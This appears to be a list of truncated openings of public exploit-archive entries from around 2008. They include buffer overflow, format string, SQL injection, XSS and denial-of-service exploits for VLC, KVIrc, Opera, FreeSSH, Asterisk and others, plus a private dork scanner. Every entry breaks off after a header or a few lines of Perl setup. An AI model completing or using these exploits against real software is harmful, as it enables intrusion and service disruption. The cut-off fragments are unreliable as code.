!-- KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC) Summary: KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit. KVirc is being written by Szymon Stefanek and the KVIrc Development Team with the contribution of many IRC a
/*0day TUGzip 3.00 archiver .ZIP File Local Buffer Overflow If you change things ,forever,there's no going back,you see for them you're just a freak, like me ..Mhaaaahaaaaaaaaaaaaaaaaaaaa(JK) Well hello there ,greetz from Romania,here is a exploit fo
#!/usr/bin/perl # 10/23/2008 k`sOSe # Rewritten VLC 0.9.4 .TY File Buffer Overflow Exploit # 1 - Works on Windows XP SP1, SP2, SP3 (and probably win2k) # 2 - Works both with a local file and with a remote url # 3 - VLC do not crash! # 4 - Enjoy a res
?php/***** BEGIN LICENSE BLOCK *****CSSH - a proof of concept CSS based history crawlerCopyright (C) 2008 SirdarckcatThis program is free software; you can redistribute it and/or modifyit under the terms of the GNU General Public License as publishe
!-- Just found a way to use Stefanos opera:config idea to execute code from remote. Instead of changing the HTTP Proxy, an attacker can change the default external mail application to \evilmalware.exe , or to local commands (e.g. ftp.exe which can
#!/usr/bin/perl -w #copywrite Blake Cornell # http://www.securityscraper.com/ # for more info #Asterisk 1.4,1.6 et. al. # Resource Exhaustion # Asterisk cannot recover #goto http://www.voip0day.com for more information use strict; use IO::Socket; us
#!/usr/bin/perl # This Exploit requires a valid user name and password of an account regardless of the permissions # # Author: Xianur0 # Affected: All Versions # Bug: SQL Injection # # Doorks: # allintext: powered by LoudBlog use HTTP::Request::Commo
Advisory: DNS TXT Record Parsing Bug in LibSPF2 Author: Dan Kaminsky, Director of Penetration Testing, IOActive Inc, Dan.Kaminsky@ioactive.com (PGP Key In Appendix) Abstract: A relatively common bug parsing TXT records delivered over DNS, dating at l
# GoodTech SSH Remote Buffer Overflow Exploit # Written by r0ut3r - writ3r [at] gmail.com # # SSH_FXP_OPEN command contains a buffer oveflow. # # All other operations are also vulnerable, opendir, unlink, etc. # # 0day for 2 months :) use Net::SSH2;
#!/usr/bin/perl# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]# FreeSSH 1.2.1 Crash #2 -- A Product of Fuzzing. Stay Tuned For More.use Net::SSH2;$host = 192.168.0.100;$port = 22;$username = test;$password = test;$dos = A x 262145;$ssh2
======================================================================= = Opera Stored Cross Site Scripting Vulnerability = = Vendor Website: = http://www.opera.com = = Affected Version: = -- All desktop versions = = Public disclosure on 22nd October
#!/usr/bin/perl # Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] # FreeSSH 1.2.1 Crash -- A Product of Fuzzing. Stay Tuned. use Net::SSH2; $host = 192.168.0.187; $port = 22; $username = test; $password = test; $dos = A x 550000; $ssh2 = N
perl # ================================================================ # # Google-php-include-bugs searcher v 0.8 # # (c)oded by drmistSTNC # # www.security-teams.net # # # # ATTENTION. THIS SCRIPT IS PRIVATE. # # ONLY FOR STNC AND FRIENDS. NOT FO